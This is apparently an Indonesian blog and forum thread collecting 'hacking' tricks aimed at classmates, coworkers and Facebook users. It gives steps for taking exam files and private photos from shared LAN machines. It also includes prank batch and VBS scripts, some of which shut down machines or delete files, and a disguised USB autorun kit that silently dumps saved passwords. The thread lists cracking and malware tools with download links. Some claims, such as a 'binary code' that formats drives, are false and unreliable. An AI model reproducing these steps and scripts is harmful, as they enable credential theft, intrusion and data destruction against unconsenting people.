Member

Search

Memuat...

Google+ Followers

Iklan

promo mobil murah

Blog Archive

Diberdayakan oleh Blogger.
Minggu, 18 Maret 2012


nda seorang pelajar di sekolah yang akan menghadapi Ulangan Semester-an dan anda tidak sempat untuk menghapal materi ujian,, namun anda punya ide “Kreatif” untuk dapat mencari soal-soal ujian semesteran tersebut,,bagaimanapun caranya… biasanya file master dari soal ujian tersebut terdapat pada suatu komputer server yang kadang kala tidak ada admin yang menjaga,, dan file tersebut ter-sharing… ini kesempatan anda buat sedikit cerdik untuk dapat menguasai file-file ujian tersebut,, hhe

Atau misalnya anda ingin sekali mengambil file foto-foto cewe kecengan anda di komputer teman anda yang sedang terhubung kedalam jaringan.. ini juga kesempatan anda untuk dapat mengkoleksi foto” tersebut,,

Dari 2 kejadian diatas,, kita pasti punya perasaan ingin melakukanya,, sekaligus berlatih kemampuan hacking anda,, caranya sangat mudah untuk dapat menguasai file” penting di tempat anda kerja,sekolah, dan tempat umum,, yang anda perlu pastikan dalam melakukan aksi ini antara lain:

- Cari tahu terlebih dahulu apakah komputer yang ingin anda hack terhubung dalam jaringan LAN atau tidak,, kalo tidak terhubung,, kita tidak dapat menjalankan aksinyaaa..

- Siapkan Komputer client yang terhubung dalam jaringan LAN tersebut..Pastikan Komputer yang akan kita gunakan untuk melakukan hack terhubung dalam Jaringan

- Sediakan Software untuk scan IP seperti “Advance IP Scanner & Advance LAN scanner” yang dapat di download di google,, anda juga dapat menggunakan software “net cat” namun penggunaannya cukup sulit

- Installkan Advance IP Scanner di komputer anda kemudian jalankan aplikasi nya,, berikut adalah tampilan aplikasinya:

Posted Image

- Kemudian Klik “C” pada toolbar IP Scanner.. Icon C berfungsi untuk mengecek IP Class C didalam Jaringan LAN Tempat anda lalu klik Scan.. IP Scanner akan Meng-scan IP yang Hidup di Jaringan Tempat Anda,, misalnya seperti gambar dibawah ini

Posted Image

- Carilah komputer yang anda curigai sebagai “Komputer Tempat menyimpan data penting seperti soal ujian dan data keuangan kantor” kemudian klik kanan lalu explorer,, Lalu carilah data penting yang anda butuhkan disini,, jangan Lupa untuk mengecek tiap komputer yang hidup.. Namun catetan penting,, hal ini dapat dilakukan bila keamanan komputer yang akan kita hack tidak secure dan telah ter sharing…

- SeLamat,, anda dapat meng hack File penting anda dengan cara yang sangaT sederhana… selamat mencoba ^_^

The Best Password Cracker


Beriku ini adalah kumpulan Password Cracker terbaik yang masih sering dipergunakan untuk keperluan Password racking. Baca terlebihdahulu link Read-ME.txt sebelum melakukan download untuk memastikan Password Cracker tersebut sesuai dengan kebutuhan Anda.

1. Cain & Abel

Spoiler Read Me
Cain & Abel
---------------------

Cain & Abel is a password recovery tool for Microsoft
Operating Systems. It allows easy recovery of various
kind of passwords by sniffing the network, cracking
encrypted passwords using Dictionary, Brute-Force and
Cryptanalysis attacks, recording VoIP conversations,
decoding scrambled passwords, recovering wireless network
keys, revealing password boxes, uncovering cached passwords
and analyzing routing protocols. The program does not
exploit any software vulnerabilities or bugs that could
not be fixed with little effort. It covers some security
aspects/weakness present in protocol's standards,
authentication methods and caching mechanisms; its main
purpose is the simplified recovery of passwords and
credentials from various sources, however it also ships
some "non standard" utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be
useful for network administrators, teachers, security
consultants/professionals, forensic staff, security
software vendors, professional penetration tester and
everyone else that plans to use it for ethical reasons.
The author will not help or support any illegal activity
done with this program. Be warned that there is the possibility
that you will cause damages and/or loss of data using this
software and that in no events shall the author be liable for
such damages or loss of data. Please carefully read the
License Agreement included in the program before using it.

The latest version is faster and contains a lot of new
features like APR (Arp Poison Routing) which enables
sniffing on switched LANs and Man-in-the-Middle attacks.
The sniffer in this version can also analyze encrypted
protocols such as SSH-1 and HTTPS, and contains filters
to capture credentials from a wide range of authentication
mechanisms. The new version also ships routing protocols
authentication monitors and routes extractors, dictionary
and brute-force crackers for all common hashing algorithms
and for several specific authentications, password/hash
calculators, cryptanalysis attacks, password decoders and
some not so common utilities related to network and system
security.


spoiler buat download
Spoiler Download cain & Abel


2. THC-Hydra
Spoiler Read me
---( Downloaded from:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://spyrozone.net
~ The newbie hackers spirit station!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For your pleasure, Hydra comes as source and binary release.

1. The source code of Hydra: hydra-5.4-src.tar.gz
(compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux, etc.)

2. The Win32/Cywin binary release: hydra-5.4-win.zip
(everything you need to run hydra on win32 platforms is in this zip file)

3. The Palm binary release: hydra-4.6-palm.zip
(created by snakebyte (at) gmx (dot) de - does not support all attack modules yet)
[NOTE: the Palm release has got a different source tree. Therefore not all]
[ modules are supported, and updates are not very often. ]


THC-Hydra Official Site:
-------------------------------------------
http://freeworld.thc.org/thc-hydra/
-------------------------------------------


Spoiler Download THC-Hydra


3. John The Ripper
Spoiler Read Me


Spoiler Download Jhon the ripper


4. Brutus
Spoiler Read Me
Brutus A2
--------------

Brutus is one of the fastest, most flexible remote password crackers you
can get your hands on - it's also free. It is available for Windows 9x,
NT and 2000, there is no UN*X version available although it is a possibility
at some point in the future. Brutus was first made publicly available in
Cctober 1998 and since that time there have been at least 70,000 downloads
and over 175,000 visitors to this page. Development continues so new
releases will be available in the near future. Brutus was written
originally to help me check routers etc. for default and common passwords

Features

Brutus version AET2 is the current release and includes the following
authentication types :
* HTTP (Basic Authentication)
* HTTP (HTML Form/CGI)
* POP3
* FTP
* SMB
* Telnet
* Other types such as IMAP, NNTP, NetBus etc are freely downloadable
from this site and simply imported into your copy of Brutus. You can
create your own types or use other peoples.

The current release includes the following functionality :
* Multi-stage authentication engine
* 60 simultaneous target connections
* No username, single username and multiple username modes
* Password list, combo (user/password) list and configurable brute force modes
* Highly customisable authentication sequences
* Load and resume position
* Import and Export custom authentication types as BAD files seamlessly
* SOCKS proxy support for all authentication types
* User and password list generation and manipulation functionality
* HTML Form interpretation for HTML Form/CGI authentication types
* Error handling and recovery capability inc. resume after crash/failure.


Spoiler Download Brutus

Oh ya ini artikel aq dapat dari www.Spyrozone.net

Format harddisk pake notepad..!

wew..ada tutorial baru nie all n gw dapat dari bang yakub27..yaitu code buat format harrdisk..kekeke..ok brotha,,check this out:
1. Buka Notepad terus copas tulisan di bawah ini
Code: Select all
01001011000111110010010101010101010000011111100000

2. Simpan file dengan nama terserah anda. Yang penting ekstensinya .EXE
bisa kan save dengan ekstensi .EXE ??
jangan di gunakan di komputer pribadi anda
dan jangan sekali” mempunyai pikiran jahat denagn menggunakan ini..wkwkwkw

3.klo dah di save dengan ekstensi .EXE
trus di double click dehh.. bimsalabim.. punya hardisk baru deh..hahags
tips: kalo mau kerjain orang silahkan tambahkan autorun di massukan di flashdisk

1. format c:\ /Q/X — ini akan memformat drive c:
Code: Select all
01100110011011110111001001101101011000010111010000 10000001
1000110011101001011100
001000000010111101010001001011110101100
2. format d:\ /Q/X — ini akan memformat drive d:
Code: Select all
01100110011011110111001001101101011000010111010000 100000011
001000011101001011100
0010000000101111010100010010111101011000

Cegah Virus VBS Berkembang Biak Dgn Simpel

Virus Vbs adalah virus yang dibuat menggunakan bahasa pemrograman Visual Basic Script….editornya cukup dengan notepad bawaan windows. meskipun di buatnya hanya dengan notepad virus bisa membuat kita pusing…
ok adizonners caranya begini
Buka my computer – tools – folder options
Klik tab file types, scroll kebawah, cari extensi “vbs“
Ubah default program yg digunakan untuk membuka file .vbs dgn mengklik tombol
“change“
KIta akan melihar bahwa program yg direkomendasikan untuk membuka file .vbs adalah
Microsoft ® Windows Based Script Host, ubah hal tersebut, scroll sedikit ke bawah, cari
“notepad” dan klik OK
Dengan mengubah setingan diatas, setiap kali kita mengklik/membuka file .vbs, script virus yg ditulis
didalam file .vbs tidak akan langsung dijalankan, melainkan akan ditampilkan oleh notepad. Dan
tentunya file tersebut tidak akan menginfeksi komputer kita …

Cara mendeteksi kelemahan website

Cara Mendeteksi Kelemahan Website Dengan Acunetix Web Vulnerability Scanner

Posted Image

Website atau blog adalah media untuk menumpahkan isi hati dan juga isi pikiran kita dalam bentuk tulisan, kalau pada zaman dulu kebanyakan orang-orang menumpahkan isi hati dan pikirannya hanya pada buku diary saja, tapi di zaman yang serba modern ini kebanyakan sudah beralih kepada dunia maya atau internet seperti facebook, friendster, blog/website dll. Namun bagi anda yang mempunyai website patut waspada, karena saat ini banyak sekali cracker-cracker yang bergentayangan didunia maya dan siap mengacak-acak isi website anda, dan cracker bisa melakukan aksinya dengan berbagai cara diantaranya dengan menggunakan tools maupun dengan cara manual demi mendapatkan password admin melalui exploit atau bugs yang terdapat dalam suatu website.

Karena hal yang paling penting ketika anda membuat website adalah security nya dan design webnya nomor dua, maka dari itu sebagai langkah antisipasi bagi anda yang mempunyai website adalah dengan mempatch website anda dengan plugin yang sudah disediakan secara gratis dan juga sering memperbaharui versi website anda ke versi yang baru. Selain itu ada juga cara mendeteksi kelemahan suatu website yaitu dengan berbagai tools yang banyak tersedia di google baik yang gratis maupun berbayar, tapi bagi anda yang tidak ingin banyak mengeluarkan banyak uang, bisa mendownload Acunetix Web Vulnerability Scanner versi freeware nya, dengan tool ini kita bisa mengetahui celah website seseorang dengan sangat mudah, hanya dengan memasukkan alamat website saja maka tool ini akan bekerja secara otomatis mencari celah-celah yang ada pada sebuah website. untuk nantinya bisa diperbaiki atau dipatch oleh admin.

maaf gx ada link downloadnya tapi coba liat aja di google banyak yg share kok ^_^

Bikin virus dengan Notepad(Tinggal Cpy-paste kode aja)

Waktu lg browsing, ketemu nih keren nih
copy paste code-code yang ada di bawah ini ke dalam NOTEPAD( Total ada 9 VIRUS yg bisa dibikin)
1.message yang nongol melulu

Code :
Spoiler Spoiler buat codenya
@ECHO off:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cupu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT(ekstensi filenya harus .BAT)
2.bikin shutdown+messageCode:
[i]@echo off
msg * apaan sih lo
shutdown -s -c Error! muka mu standar abis
save namafile.BAT[/i](ekstensi filenya harus .BAT)

3.Mainin Caps Lock button
Code:
[i]Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
save namafile.vbs[/i]
(save dengan Ekstensi file .vbs)

4.buka tutup CD/DVD[i]Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollectiondo
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count  1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count  1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs[/i]

5.bikin vbscript nongol mlulu
Code:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
save namafile.vbs
ket:di task manager full wscript yg lg running
[/i]

6.teken tombol backspace mlulu
Code:
[i]MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
save namafile.vbs
[/i]

7.otomatis ngetik “lu jelek banget sih” di notepad/wordCode:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys lu jelek banget sih!!!”
loop
save namafile.vbs
8.buka notepad trus menerusCode:
@ECHO off:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.
[/i]

9.otomatis buka notepad lalu ngetik apa yg lo mau
Code:
[i]WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
save namafile.vbs
ket:
ini salah satu script favorit gw…
[/i][i]10.@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxxif %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar@ECHO off:top
START %SystemRoot%\system32\notepad.exe
GOTO top[/i]


ket di atas :
kalo pilih
1.otomatis matiin computer

2.format file (terserah file apaan ganti aj dir nya)

3.sama aj kayak pilihan 1
kata2 di atas di ganti2 aj sesuai selera temen2
NB : gunakan script ini untuk menjahili teman anda
just fun only ok^^

Pirates Facebook Hack

Mengingat banyaknya peminat dan antusias para facebooker buat “menjahili” facebook orang lain, baik cuma iseng atau mau mengambil chip poker (Zynga Texas Hold’EmPoker atau permainan lainnya) saya tergerak untuk membantu kawan kawan semua sekali lagi, buat menyediakan software nya. Disini saya mencoba menawarkan sebuah software yang angka kegagalan mengambil password orang lain adalah 0%. software ini adalahPirates facebook hack v 1.4 versi terbaru (mungkin anda sudah pernah melihat versi sebelumnya) sebuah software yang selain ini juga bisa hacking facebook orang lain dengan membajak server facebook sehingga email dan password korban bisa diketahui, software ini juga bisa digunakan untuk menjaga account facebook anda dari hacking. cara melakukan hacking untuk software ini agak sedikit rumit, oleh karena itu saya juga menyediakan video tutorialnya yang bisa di download di link yang saya sediakan. ketika anda membuka software ini, akan diminta passwordnya, passwordnya adalah a1b(untuk melihat password anda harus memblock semua tulisan) kalau dengan tool yang lain anda sering gagal, saya yakin dengan tool ini anda akan berhasil…

Pirates facebook hack v 1.4 (password : a1b )

Spoiler Download pirates hack facebook 1.4nya


Kamus Hacker, Istilah Hacker
Spoiler Klik ini
1. Back Orifice: software buatan kelompok hacker ( Cult of the Dead Cow ) yang digunakan sebagai alat bantu untuk menemukan jalan masuk ke sebuah komputer dan mengendalikannya dari jarak jauh (remote). Versi terakhir yang muncul adalah Back Orifice 2000 yang mampu secara virtual mengendalikan sebuah komputer lain dengan sistem operasi Windows. Untuk bisa menggunakannya hacker harus melakukan langkah curang sedemikian rupa sehingga calon korban menerima dan menjalankan Trojan horse (TH) dalam komputernya.TH ini lazimnya diselipkan (attach file lewat email) dalam sebuah file yang tidak berpenampilan jahat namun sebenarnya mengandung program Back Orifice server tersembunyi di balik itu.
Kalau Back Orifice berhasil terinstall di komputer korban maka bisa dipastikan hacker bisa melakukan banyak hal termasuk mengendalikan (kontrol) komputer korban dari jauh. Dari hanya sekedar melihat, menghapus, menambah file sampai merubah tampilan desktop bisa dilakukan hacker pada komputer korbannya.

2. Black hat: kalau anda anggap www itu analogi wild, wild west maka anda tentu sudah bisa menebak tentu black hat ini ada di pihak yang jahat. Hacker black hat ini juga biasa disebut sebagai aka crackers” dengan kemampuan mencuri data atau merusak sistem yang ada dalam komputer korban. Kelebihan black hat adalah kemampuannya untuk menghilangkan jejak hingga tidak bisa dilacak siapa sebenarnya pelaku serangan yang terjadi setelah tujuan tertentu mereka terpenuhi.

3. Buffer overflow: ini adalah sebuah kelemahan yang mudah untuk ditemukan dan dimanfaatkan oleh hacker dalam sebuah sistem. Aplikasi dan Operating System (OS) menyimpan untuk sementara perintah yang mereka dapat di memori tertentu yang biasa disebut buffer memory. Kalau OS atau program tidak bisa dikode secara sempurna maka hacker bisa membuat komputer korban jadi terganggu dengan mengirimkan perintah yang dibuat khusus yang membuat gangguan jadi berlangsung lebih lama. Windows 95 paling rentan kalau sudah berhadapan dengan serangan seperti buffer overflow yang banyak dilancarkan lewat internet ini.
Saat ini serangan serupa sudah jarang dilancarkan pada sebuah komputer. Namun terkadang hacker masih sering melakukannya untuk memperlambat kinerja sebuah situs.

4. Denial-of-service attack : adalah sebuah istilah yang diberikan untuk upaya serangan dengan jalan menurunkan kinerja sebuah web site dengan terus menerus mengulang request ke server dari banyak sumber secara simultan. Serangan seperti ini bertujuan membuat server korban jadi kuwalahan melayani request yang terkirim dan berakhir dengan menghentikan aktivitas atau berhenti dengan sendirinya karena tak mampu melayani request.

5. Distributed denial-of-service attack (DdoS): di masa lalu hacker hanya bisa melancarkan serangan denial-of-service attack dengan mengirimkan request dalam jumlah besar secara simultan dan kontinyu dari sebuah komputer. Namun sekarang hacker bisa mengirimkan serangan dari beberapa komputer yang diaktifkan secara remote. Pada tahun 1998 sebuah kelompok hacker menciptakan program yang memungkinkan seorang hacker mengirimkan sebuah perintah dalam jumlah besar ke komputer korban yang lain agar bisa dikendalikan secara remote. Setelah beberapa komputer korban ada dalam kendalinya, secara bersamaan komputer korban tersebut dikoordinir untuk melancarkan denial-of-service attack kepada korban lain yang menjadi target utama.
Layaknya zombie beberapa komputer yang menjadi korban sebelumnya dikendalikan secara remote untuk melakukan request secara kontinyu dan simultan ke komputer target utama. Serangan serupa DdoS ini sudah
terbukti berhasil melumpuhkan beberapa web server milik situs besar kenamaan seperti Yahoo.com dan eTrade.com. Namun dengan sebuah software pendeteksi dan pengalaman yang cukup admin jaringan di beberapa jaringan besar sudah selayaknya mampu menangkal serangan seperti ini.

6. Exploit: ini merupakan sebuah ungkapan untuk keberadaan sebuah celah keamanan dalam software yang berjalan di sebuah komputer. Lewat exploit inilah peluang untuk melakukan serangan terbuka bagi hacker.
Setiap software atau sistem operasi baru dirilis maka pada saat yang sama genderang perang ditabuh untuk memberi komando pada hacker mulai mencari kelemahannya. Setiap ada kelemahan baru ditemukan oleh para hacker maka pengumuman akan segera tersebar lewat beberapa media yang menjadi forum komuniakasi mereka. Kebanyakan kabar tersebut akan disebarkan di beberapa mailing list seperti CERT, BugTraq, Microsoft’s security bulletins dan beberapa lagi lainnya. Dengan disebarkannya penemuan tersebut pembuat software bisa mengupayakan penangkalnya. Pemakai juga bisa jadi lebih waspada akan terjadinya serangan. Dalam kebanyakan kasus yang terjadi biasanya pemakai software kurang waspada akan kelemahan software yang dipakainya padahal kabar sudah disebar dan penangkal sudah bisa didapat.

7. Firewall: adalah sebuah software program yang dipasang pada sebuah jaringan dan bertugas menjadi penghalang bobolnya akses untuk kepentingan jahat layaknya sebuah saringan. Semua aktivitas keluar dan masuk ke jaringan harus melalui penyaringan ini hingga akses tertentu yang berbahaya bisa dibatasi. Saringan ini juga bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.

8. Hacktivism: adalah aktivitas penyerangan oleh hacker yang dimotivasi oleh simpati tertentu. Hal semacam ini muncul bila aktivis sosial maupun politik menggabungkan kemampuan menyerang yang dimiliki dan menggunakannya untuk kepentingan menarik simpati lebih besar atau unjuk rasa lewat internet.

9. Intrusion detection system (IDS): sama seperti firewall IDS ini merupakan penghambat semua niat jahat yang akan megganggu sebuah jaringan. Bedanya IDS ini lebih mau selangkah dengan kemampuannya memberi peringatan kepada admin server saat terjadi sebuah aktivitas tertentu yang tidak diinginkan admin sebagai penanggung jawab. Selainmemberi peringatan dini IDS juga memberi beberapa alat bantu untuk melacak jenis dan sumber aktivitas terlarang tersebut.

10. Root: istilah ini diadaptasi dari sitem UNIX dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada sebuah sistem. Hacker menggunakan istilah ini untuk menggambarkan kemampuan mereka dalam melancarkan serangan dan menguasai sistem korbannya.

11. Script kiddie: sebuah pola serangan yang sering dilancarkan oleh hacker pemula dengan menggunakan alat bantu ringan yang bisa mereka dapatkan di banyak situs hacker lainnya. Alat bantu yang biasanya berisi sederetan skrip sederhana ini mereka gunakan untuk mendeface atau melancarkan DOS pada korban yang memiliki expolit. Hacker dengan jam terbang yang lebih tinggi biasanya mencibir hacker permula yang menggunakan metode ini karena biasanya mereka hanya menggunakan tanpa tahu teknologi dan konsep yang ada di balik pola serangan yang dilancarkan

12. Trojan horse: adalah sebuah aplikasi yang didesain untuk melakukan sebuah kecurangan namun terselubung dengan kebaikkan. Biasanya metoda yang dipakai adalah dengan menyelipkan (attach file lewat email) sebuah file tertentu yang mengandung trojan horse namun dengan kemasan menarik. Kalau trojan horse berhasil menginfeksi maka bisa dipastikan hacker bisa mendapat akses tak terhingga ke komputer korban. Tiga jenis trojan horse yang popular digunakan adalah Back Orifice, NetBus, dan SubSeven.

13. White hat: hacker dengan kategori ini cenderung lebih memanfaatkan pengetahuan mereka untuk memuaskan rasa ingin tahu bagi intelektualita ketimbang untuk perbuatan jahat yang merusak. Hacker seperti ini sangat nanti dengan perusakan sebuah sistem, pencurian data mauoun merusak kinerja sebuah situs. Namun aktivitas mereka tetap saja menjadi tidak legal bila mereka ingin menguji sebuah sistem milik orang lain yang dimana mereka tidak memiliki otoritas untuk itu. Dalam aktivitasnya tidak jarang mereka melakukan perusakan yang tidak disengaja seperti merubah atau menghapus data yang ada. Kebanyakan hacker seperti ini bekerja secara resmi diperusahaan tertentu sebagai programer, konsultan maupun admin server.


Hacking: Tool Kecil Pembobol Pasword E-Mail,FS,FB, Game dll

(MOHON JANGAN DISALAHGUNAKAN)
Ada dua tool kecil yang gedenye cuma 40KB tapi khasiatnya muantaaaaaaab…dan tanpa perlu di instal, langsung di jalanin..saya contohin, misalnye ente pengen tau password email, fs dsb dari temen kerja kamu yang ada di samping kamu.

Caranye, kamu tunggu dia cabut dari kursinye. Pas dia ninggalin tuh kursinye, kamu jalanin aje tuh tool via Flashdisk atau floppy.
Tapi sebelumnye ente disable dulu anti virus di tuh kompi, soalnye kalo ga bakal ke ditek jadi trojan (yang jelas ni tool bukan virus).
Abis ntu…..dicoba jalanin deh.
Jreng—-jreng!!!!….semua password yang beberapa menit lalu pernah dimasukin sama temen kamu, bakal kebuka tanpa kecuali. Hebat kan?
Jadi intinye ni tool bakal nyedot semua password yang tersimpan di cookies dari kompi yang abis di pake wat ngenet. Gityu bro.

Untuk calon victim nyang pake Firefox download:

Spoiler Download yg pake fire fox


Untuk calon victim nyang pake Internet Explorere

Spoiler Download yg pake fire Internet Explorer


Kelemahan: Komputer yg mau dipakai tidak boleh direstart atau dimatikan.
Dari Forum Jasakom.

Menjadikan Flashdisk sebagai menjadi alat hacker

Briliant, and simpel, td ini aq temuin waktu lg browsing
Ada sejumlah tools yang berfungsi merecovery (memulihkan) password dari file tempatnya di simpan dengan memanfaatkan USB flashdisk. Anda dapat membuat rootkit Anda sendiri untuk meng-hack password. berikut ini sejumlah tools untuk Menjadikan flashdisk menjadi alat hack password :

MessenPass :
piranti recover password yang paling populer untuk Program Instant Messenger seperti: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, dan Gaim.

Mail PassView :
merecovery password dari program email seperti: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird dan Group Mail Gratis lainnya.

IE Passview :
adalah utilitas sederhana yang bisa merecovery password dari browser Internet Explorer. Versi ini mendukung Internet Explorer 7.0, serta versi Internet explorer, v4.0 – v6.0.

Protected Storage PassView :
merecovery semua password yang tersimpan dalam Protected Storage, termasuk AutoComplete password Internet Explorer, password dari situs yang dilindungi sandi, MSN Explorer Sandi, dan masih banyak lagi …

PasswordFox :
PasswordFox adalah utilitas pemulihan password sederhana yang memungkinkan anda melihat nama pengguna dan sandi yang disimpan oleh browser Mozilla Firefox. Secara default, PasswordFox menampilkan password yang disimpan dalam profil aktif Anda, tetapi Anda dapat dengan mudah memilih untuk melihat password Firefox di lain profil.

Berikut adalah langkah demi langkah untuk menciptakan procedure password hacking toolkit dalam USB Drive (Flashdisk):
CATATAN: Anda harus menonaktifkan sementara antivirus Anda sebelum mengikuti langkah-langkah ini.
1. Download dan ekstrak ke 5 tools di atas dan copy file executable (Exe file) saja ke Flashdisk yaitu: Salinlah file – mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe ke dalam USB Drive.

2. Buat file Notepad baru dan dan ketik teks berikut ini :
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

3. Simpan Notepad and rename dari New Text Document.txt menjadi autorun.inf, lalu
copy file autorun.inf ke dalam USB drive.

4. Buat file Notepad baru lagi dan ketik teks berikut :
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

5. Simpan file Notepad and gantilah namanya dari New Text Document.txt menjadi launch.bat, lalu Salin file launch.bat USB drive Anda.
Sekarang rootkit Anda sudah siap di gunakan untuk hack password. Namun, tools Hack ini akan bekerja pada Windows 2000, XP, Vista dan 7 serta akan memulihkan password jika ada password yang tersimpan dalam computer.
Cara menggunakan flashdisk hack tools sebagai berikut :

1. Masukkan flashdisk ke USB Port dan jendela pop-up autorun akan tampil. (Hal ini karena, ada telah menciptakan sebuah autorun di flashdisk).

2. Pada jendela pop-up, pilih pilihan pertama (melakukan scan Virus).

3. Sekarang, semua hacking tools password berjalan secara diam-diam di belakang layar. Proses ini memakan waktu tidak terlalu lama. Password yang di
temukan akan di recover untuk selanjutnya disimpan dalam sebuah file TXT.

4. Keluarkan flashdisk dan Anda akan melihat password yang tersimpan dalam format TXT file.Ü

Ok dengan begini kamu bisa menjadi top hacker seperti yg pepatah mengantakan
"kalau kita mau pasti tercapai"

jadi saya ucapkan selamat menjadi hacker kaya saya

Note : ini semua trik saya kumpulkan semuanya sampai memory saya penuh 100% <_<

Sumber : Disini
This post has been edited by tewas1: 17 October 2010 - 06:34 PM
0

User is offline Bot Spammers

  • Bot Junkers
  • Remove Friend
  • PM this member
  • ID No: -1
  • Group: Tukang Iklan
  • Posts: Gak Perlu
  • Joined: Tahun Depan



MOHON BACA RULES N3

Diatas merupakan peringatan dan iklan yang dibuat oleh bot official N3 ! Posting diatas bukan pelanggaran !

#2
User is offline   crozzbone 


  • TK
  • ID No: 75715
  • Group: Level I
  • Posts: 128
  • Joined: 18-September 10
ane mau nambah buat ngelengkapin
tools yg di gunakan hackers

- Anon FTP
- Arpinject
- Aspack21
- Atk-2.1
- Bios Pas Remover
- BlasterW32
- Blue
- BMP Ripper
- Brutus
- CASXM138
- CAYZODQF
- CGI Founder v1.043
- CGI Sscan
- Cia10
- Cragle
- [JaMu] Zip
- Davs TR Retail
- Deep Un Freeze
- Dr VBS
- EES Binder
- FTP BR
- Genexe
- Grinder 1.1
- Hack Flash Tempelate
- Hack My Space
- Hack Photoshop CS2
- Hackers Assistant
- Hack the game
- H C K
- HL Boom
- Hotmail Scam Page
- Hydra
- John
- Key Logger
- Legion NetmBios Scanner
- Mail Bomb_2.0 YAHOO
- MIDNITE massacren
- NFO Maker
- Nimda
- Nkedb
- NT Packer
- NTS
- Null Ass Frontend
- P0kes WormGen
- Panther
- Pkp BB pass extractor
- phpBBAttacker
- Pqwak2
- Proxy Pro
- Rainbow [JaMu]
- Res Hacker
- Rocket
- RPC
- Rpc scan
- Sasser
- Send Mailer
- Show Pass
- Site Digger
- Smbat- win32bin
- SMB Die
- SMB Proxy
- Sprut
- Stealth- HTTP Scanner
- Super
- TFTPD32
- T Hunter
- Tina soft KILL
- UPD Flood
- Ultra Dos
- Visa Spam
- X Pass
- Yahoo Password
- Zehir
- Addr View
- AOL View
- App To Service
- Astaroth Joiner
- Bank Of America
- Cable Modem Sniffer
- Cap Keys DIGITAL
- C Ports
- C C Generator
- DDL Sites
- eBay
- E Gold.
- E-mail Cracker
- Database Defacer
- F.B.I. Binder
- FTP Brute Forcer
- [Minta Di Banned Please] Mail Bomber
- PhpBB_exploit_pack
- Google Hacker
- Hook Tool Box
- Hotmail Email Hacker
- Hotmail Hack
- HSBC-US
- Iecv
- IP2
- Ip Net Info
- Key Chenger
- Moore R. Port Scanner
- Msn Flooder
- Msn Account Cracker
- Msn Loader
- NET BIOS Scaner
- Net bios name scanner
- Net Res View
- NO limit cracker
- On-Off MSN
- OS Update Hack
- Pay Pal
- PC Any Pass
- Php Nuke Hacker
- phpBB Annihilator
- phpbb bruteforcer.
- phpBB_DoS
- phpBB_spammer
- phpBBAttacker
- phpBBcracker
- php Bug Scan
- PHP Fucker
- PhpNuke_ bypass
- Ping & Nukes
- Port Listener
- procexp
- Pro Mo
- phpBB Email harvester
- Remote Shut Down
- Server 2003 [JaMu]
- Server Killer
- Source Checker
- Source codes
- SQL Scan
- Super Scan
- Traceroute
- UC.Forum Spam
- USBank
- Win XP Activator
- Win XP Corperate [JaMu]
- Who is td
- Warez Sites
- Win Admin pass Hack
- Yahoo Ultra Cracker
- Web Cracker
- Win Xp Key Changer
- Win XP Key Viewer
- XP lizer
- Window Hide
- www Hack
- Win XP [JaMu].

bisa di download di bawah sini
http://rapidshare.co...k.2008.zip.html

Note : Jgn di salah gunakan tools ini. thx
This post has been edited by crozzbone: 13 October 2010 - 01:33 AM
0

